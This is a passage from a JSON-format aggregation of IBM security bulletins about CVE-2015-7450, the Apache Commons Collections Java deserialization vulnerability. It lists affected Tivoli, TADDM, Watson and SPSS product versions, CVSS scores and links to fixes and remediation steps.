7.1.4| Linux \nWindows| <http://www.ibm.com/support/docview.wss?uid=swg24041094> \n6.4| 6.4.3.1| Linux \nWindows| <http://www.ibm.com/support/docview.wss?uid=swg24041370> \n6.3| 6.3.2.5| Linux \nWindows| [http://www.ibm.com/support/docview.wss?uid=swg24037601](<http://www-01.ibm.com/support/docview.wss?uid=swg24037601>) \n \n**_Tivoli Storage \nFlashCopy Manager for VMware Release_**| **_ \nFirst Fixing VRMF Level_**| **_ 
\nClient_** \n**_Platform_**| **_ \n \nLink to Fix / Fix Availability Target_** \n---|---|---|--- \n4.1| 4.1.4| Linux| <http://www.ibm.com/support/docview.wss?uid=swg24041139> \n3.2| 3.2.0.6| Linux| Note that 3.2.0.5 is no longer available for download. You can download 3.2.0.9 to obtain the fix:<ftp://public.dhe.ibm.com/storage/tivoli-storage-flashcopymanager/patches/v3r2/vmware/> \n3.1| 3.1.1.3| Linux| Fixes for release 3.1 are no longer available for download as this release is no longer supported. Customers requiring fixes should upgrade to the latest release which contains the most recent security fixes. Contact IBM Support with any questions. \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions. \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:13:55", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Tivoli Storage Manager for Virtual Environments: Data Protection for VMware and IBM Tivoli Storage FlashCopy Manager for VMware (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T15:13:55", "id": "7A9325A3A31DA6075D430BD9972B87037EACC19F9E8A6BECE8F05FDEEF567CEB", "href": "https://www.ibm.com/support/pages/node/273791", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:46:57", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Tivoli Composite Application Manager Agent for J2EE.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Tivoli Composite Application Manager Agent for J2EE: 7.1.1\n\n## Workarounds and Mitigations\n\nThe affected Apache commons-collections-3.2.jar is in the IBM Tivoli Composite Application Manager Agent for J2EE image. 
Instructions for replacing commons-collections-3.2.jar with commons-collections-3.2.2.jar can be found at <http://www.ibm.com/support/docview.wss?uid=swg21972199>\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:13:51", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Tivoli Composite Application Manager Agent for J2EE (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T15:13:51", "id": "0629AF41906DD26A46F9FEDBC0E3DEA130B830A45C43613EEC32A92E38CD9329", "href": "https://www.ibm.com/support/pages/node/273589", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:46:58", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Tivoli Storage Manager Operations Center (IBM Spectrum Protect Operations Center) and IBM Tivoli Storage Manager Client Services (IBM Spectrum Protect Client Management Services). 
\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nIBM Tivoli Storage Manager Operations Center (Spectrum Protect Operations Center) V6.4 and V7.1 \n\nIBM Tivoli Storage Manager Client Management Services (Spectrum Protect Client Management Services) V7.1\n\n## Remediation/Fixes\n\n**Release**| **First Fixing VRMF Level**| **Remediation/First Fix** \n---|---|--- \nOC 6.4 *| OC 6.4.2.300| [ALL Operating Systems](<ftp://ftp.software.ibm.com/storage/tivoli-storage-management/patches/opcenter/6.4.2.300/>) \nOC 7.1| OC 7.1.4.000| [ALL Operating Systems](<ftp://ftp.software.ibm.com/storage/tivoli-storage-management/maintenance/opcenter/v7r1/>) \nCMS 7.1| CMS 7.1.4.000| [ALL Operating Systems](<ftp://ftp.software.ibm.com/storage/tivoli-storage-management/maintenance/cms/v7r1/>) \n \n* If the Operations Center is running on AIX, you must uninstall the Operations Center before you install the iFix. 
Instructions for uninstalling the Operations Center are available here: <http://www.ibm.com/support/knowledgecenter/SSGSG7_6.4.1/com.ibm.itsm.srv.install.doc/t_oc_inst_uninstalling.html?lang=en>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:13:28", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Tivoli Storage Manager Operations Center (OC) and Client Management Services (CMS) (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T15:13:28", "id": "5518E42719E2CDA44942EEB207D99CA80651C3C9A128414CB23DFF383B97AF66", "href": "https://www.ibm.com/support/pages/node/272619", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:47:00", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by TADDM.\n\n## Vulnerability Details\n\n**CVEID:** 
[CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/107918> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nTADDM 7.3.0 - 7.3.0.2 \nTADDM 7.2.2 - 7.2.2.4 \nTADDM 7.2.1 - 7.2.1.6 \nTADDM 7.2.0 - 7.2.0.10\n\n## Remediation/Fixes\n\nThere are eFixes prepared on top of the released GA and FixPack levels for each stream: \n\n**Product**| **VRMF**| **APAR**| **How to acquire fix** \n---|---|---|--- \nTADDM| 7.3.0.1 - 7.3.0.2| None| [Download eFix](<ftp://ftp.ecurep.ibm.com/fromibm/tivoli/efix_apache-commons-collections-3.2.2-wlp.zip>) \nTADDM| 7.3.0 \n7.2.2 - 7.2.2.4 \n7.2.1 - 7.2.1.6 \n7.2.0 - 7.2.0.10| None| [Download eFix](<ftp://ftp.ecurep.ibm.com/fromibm/tivoli/efix_apache-commons-collections-3.2.2.zip>) \n \nNote that the eFixes require manual deletion of the vulnerable version of the Apache Commons Collections library. \nPlease familiarize yourself with the eFix readme in etc/<efix_name>_readme.txt. \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions. \n\n## Workarounds and Mitigations\n\nThe only solution is to apply the eFixes. They are prepared on top of GA and FixPack releases. \nIf you need an eFix for another TADDM version, please contact IBM Support. Open a PMR for a custom version of this eFix. 
Include your current eFix level, TADDM version and a link to this bulletin.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:13:18", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Tivoli Application Dependency Discovery Manager (TADDM) (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T15:13:18", "id": "75FBC99F16C88B1504B48FA2439543EF4EB7781607D6FBD77B50EA9DDDB94345", "href": "https://www.ibm.com/support/pages/node/272181", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:47:01", "description": "## Summary\n\nIBM has published information about a security vulnerability in IBM WebSphere Application Server shipped with Tivoli Integrated Portal in Tivoli Network Manager IP Edition.\n\n## Vulnerability Details\n\nPlease consult the security bulletin Vulnerability in Apache Commons affects [IBM WebSphere Application Server (CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about the fix.\n\n## Affected Products and 
Versions\n\n**_Affected Product and Version(s)_**| **_Product and Version shipped as a component_** \n---|--- \nTivoli Network Manager IP Edition 3.8| Bundled the TIP version 1.1.1.x which includes IBM WebSphere version 6.1.0.x. \nTivoli Network Manager IP Edition 3.9| Bundled the TIP version 2.1.0.x which includes IBM WebSphere version 7.0.0.x. \nTivoli Network Manager IP Edition 4.1| Bundled the TIP version 2.2.0.x which includes IBM WebSphere version 7.0.0.x. \nTivoli Network Manager IP Edition 4.1.1| Bundled the TIP version 2.2.0.x which includes IBM WebSphere version 7.0.0.x. \n \nNote: If TIP has been upgraded, please follow the TIP security bulletin to upgrade to the appropriate IBM WebSphere version. \n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:13:11", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with Tivoli Network Manager IP Edition (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T15:13:11", "id": "824E537DD314DA72866A8405781D328166B8D8F77550C925EC957FB68C2CB1CA", "href": 
"https://www.ibm.com/support/pages/node/272031", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:47:35", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by Watson Explorer and Watson Content Analytics.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n\n\n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \n\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\n * Watson Explorer Annotation Administration Console version 11.0 and version 10.0 through 10.0.0.2\n * Watson Explorer Analytical Components version 11.0 and version 10.0 through 10.0.0.2\n * Watson Content Analytics version 3.5 through 3.5.0.3 and version 3.0 through 3.0.0.6\n\n## Remediation/Fixes\n\nDownload the readme file and the ZIP file or TAR file for your environment, and then follow the instructions in the readme file to install the fix. \n\nThe table reflects product names at the time the specified versions were released. To use the links to Fix Central in this table, you must first log in to the IBM Support: Fix Central site at <http://www.ibm.com/support/fixcentral/>.\n\n**Affected Product**| **Affected Versions**| **How to acquire and apply the fix** \n---|---|--- \nIBM Watson Explorer Foundational Components Annotation Administration Console| 11.0| \n\n 1. 
Download the readme file for your edition (EE for Enterprise or AE for Advanced) from [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=11.0.0.0&platform=All&function=all#Watson%20Explorer>), for example: **11.0.0.0-WS-WatsonExplorer-EEFoundationalAAC-Readme-IF001**\n 2. Download the interim fix for your edition and operating system from [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=11.0.0.0&platform=All&function=all#Watson%20Explorer>): interim fix **11.0.0.0-WS-WatsonExplorer-EEFoundationalAAC-<OS>-IF001** (for example, 11.0.0.0-WS-WatsonExplorer-EEFoundationalAAC-Linux-IF001).\n 3. Follow the instructions in the readme file to apply the fix. \nIBM Watson Explorer Foundational Components Annotation Administration Console| 10.0 through 10.0.0.2| \n\n 1. If not already installed, install V10.0 Fix Pack 2 (see the Fix Pack [download document](<http://www.ibm.com/support/docview.wss?uid=swg24039429>)).\n 2. Download the readme file for your edition (EE for Enterprise or AE for Advanced) from [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=10.0.0.2&platform=All&function=all#Watson%20Explorer>), for example: **10.0.0.2-WS-WatsonExplorer-EEFoundationalAAC-Readme-IF001**\n 3. Download the interim fix for your edition and operating system from [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=10.0.0.2&platform=All&function=all#Watson%20Explorer>): interim fix **10.0.0.2-WS-WatsonExplorer-EEFoundationalAAC-<OS>-IF001** (for example, 10.0.0.2-WS-WatsonExplorer-EEFoundationalAAC-Windows-IF001).\n 4. 
Follow the instructions in the readme file to apply the fix. \nIBM Watson Explorer Analytical Components| 11.0| \n\n 1. Download the readme file from [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=11.0.0.0&platform=All&function=all#Watson%20Explorer>): **11.0.0.0-WS-WatsonExplorer-AEAnalytical-Readme-IF001**\n 2. Download the interim fix for IBM Watson Explorer Advanced Edition and your operating system from [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=11.0.0.0&platform=All&function=all#Watson%20Explorer>): interim fix **11.0.0.0-WS-WatsonExplorer-AEAnalytical-<OS>-IF001** (for example, 11.0.0.0-WS-WatsonExplorer-AEAnalytical-Linux-IF001).\n 3. Follow the instructions in the readme file to apply the fix. \nIBM Watson Explorer Analytical Components| 10.0 through 10.0.0.2| \n\n 1. If not already installed, install V10.0 Fix Pack 2 (see the Fix Pack [download document](<http://www.ibm.com/support/docview.wss?uid=swg24039430>)).\n 2. Download the readme file from [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=10.0.0.2&platform=All&function=all#Watson%20Explorer>): **10.0.0.2-WS-WatsonExplorer-AEAnalytical-Readme-IF001**\n 3. Download the interim fix for IBM Watson Explorer Advanced Edition and your operating system from [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=10.0.0.2&platform=All&function=all#Watson%20Explorer>): interim fix **10.0.0.2-WS-WatsonExplorer-AEAnalytical-<OS>-IF001** (for example, 10.0.0.2-WS-WatsonExplorer-AEAnalytical-Linux-IF001).\n 4. 
Follow the instructions in the readme file to apply the fix. \nIBM Watson Content Analytics| 3.5 through 3.5.0.3| \n\n 1. If not already installed, install V3.5 Fix Pack 3 (see the Fix Pack [download document](<http://www.ibm.com/support/docview.wss?uid=swg24040936>)).\n 2. Download the readme file from [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/IBM+Cognos+Content+Analytics&release=3.5.0.3&platform=All&function=all#Others>): **3.5.0.3-WT-WCA-Readme-IF001**\n 3. Download the interim fix for your operating system from [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/IBM+Cognos+Content+Analytics&release=3.5.0.3&platform=All&function=all#Others>): interim fix **3.5.0.3-WT-WCA-<OS>-IF001** (for example, 3.5.0.3-WT-WCA-AIX-IF001).\n 4. Follow the instructions in the readme file to apply the fix. \nIBM Content Analytics with Enterprise Search| 3.0 through 3.0.0.6| \n\n 1. If not already installed, install V3.0 Fix Pack 6 (see the Fix Pack [download document](<http://www.ibm.com/support/docview.wss?uid=swg24040579>)).\n 2. Download the readme file from [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/IBM+Cognos+Content+Analytics&release=3.0.0.6&platform=All&function=all#Others>): **3.0.0.6-WT-ICA-Readme-IF001**\n 3. Download the interim fix for your operating system from [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/IBM+Cognos+Content+Analytics&release=3.0.0.6&platform=All&function=all#Others>): interim fix **3.0.0.6-WT-ICA-<OS>-IF001** (for example, 3.0.0.6-WT-ICA-Linux-IF001).\n 4. Follow the instructions in the readme file to apply the fix. 
\n \n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T13:06:25", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects Watson Explorer and Watson Content Analytics (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T13:06:25", "id": "907D422E64306B77CE4FC8F237994BB7A9BE500E8F53773E33B3C6A72CB4F50D", "href": "https://www.ibm.com/support/pages/node/272913", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:52:06", "description": "## Summary\n\nAn Apache Commons Collections vulnerability in handling Java object deserialization was addressed by IBM SPSS Collaboration and Deployment Services. This vulnerability affects all versions of IBM SPSS Collaboration and Deployment Services. \n \nAn updated IBM WebSphere Liberty runtime is shipped to address a security vulnerability in IBM SPSS Collaboration and Deployment Services 7.0. 
\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM SPSS Collaboration and Deployment Services 7.0 \n\nIBM SPSS Collaboration and Deployment Services 6.0\n\nIBM SPSS Collaboration and Deployment Services 5.0\n\n## Remediation/Fixes\n\n_Product_| _VRMF_| _Remediation/Fix Central Link (install instructions in zip)_ \n---|---|--- \nRepository Server| 5.0| [5.0](<https://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Collaboration+and+Deployment+Services&function=fixId&fixids=5.0.0.3-SCaDS-RepositoryServer-IF002>) \nRepository Server| 6.0| [6.0](<https://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Collaboration+and+Deployment+Services&function=fixId&fixids=6.0.0.2-SCaDS-RepositoryServer-IF002>) \nRemote Scoring Server| 6.0| [6.0](<https://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Collaboration+and+Deployment+Services&function=fixId&fixids=6.0.0.2-SCaDS-RemoteScoringServer-IF002>) 
\nRemote Process Server| 6.0| [6.0](<https://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Collaboration+and+Deployment+Services&function=fixId&fixids=6.0.0.2-SCaDS-RemoteProcessServer-IF002>) \nRepository Server| 7.0| [7.0](<https://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Collaboration+and+Deployment+Services&function=fixId&fixids=7.0.0.1-SCaDS-RepositoryServer-IF002>) \nRemote Scoring Server - Easy Install Option (Liberty)| 7.0| [7.0](<parent=SPSS&product=ibm/Information+Management/SPSS+Collaboration+and+Deployment+Services&function=fixId&fixids=7.0.0.1-SCaDS-RemoteScoringServer-Easy-Deploy-IF002>) \nRemote Scoring Server - Manual Install Option| 7.0| [7.0](<https://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Collaboration+and+Deployment+Services&function=fixId&fixids=7.0.0.1-SCaDS-RemoteScoringServer-Manual-Deploy-IF002>) \nRemote Process Server| _7.0_| [7.0](<https://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Collaboration+and+Deployment+Services&function=fixId&fixids=7.0.0.1-SCaDS-RemoteProcessServer-IF002>) \n \n## Workarounds and Mitigations\n\nNA\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T13:37:21", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in bundled components affects IBM SPSS Collaboration and Deployment Services (CVE-2015-7450).", "bulletinFamily": "software", "cvss2": {"severity": 
"HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-16T13:37:21", "id": "842AA4D3168931006C05FFF54B0EA436F2CF6E10D76F87FCD72C3D78D4D077DF", "href": "https://www.ibm.com/support/pages/node/272711", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:52:06", "description": "## Summary\n\nAn Apache Commons Collections vulnerability in handling Java object deserialization was addressed by IBM SPSS Analytic Server. \n \nAn updated IBM WebSphere Liberty runtime is shipped to address a security vulnerability in IBM SPSS Analytic Server. \n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. 
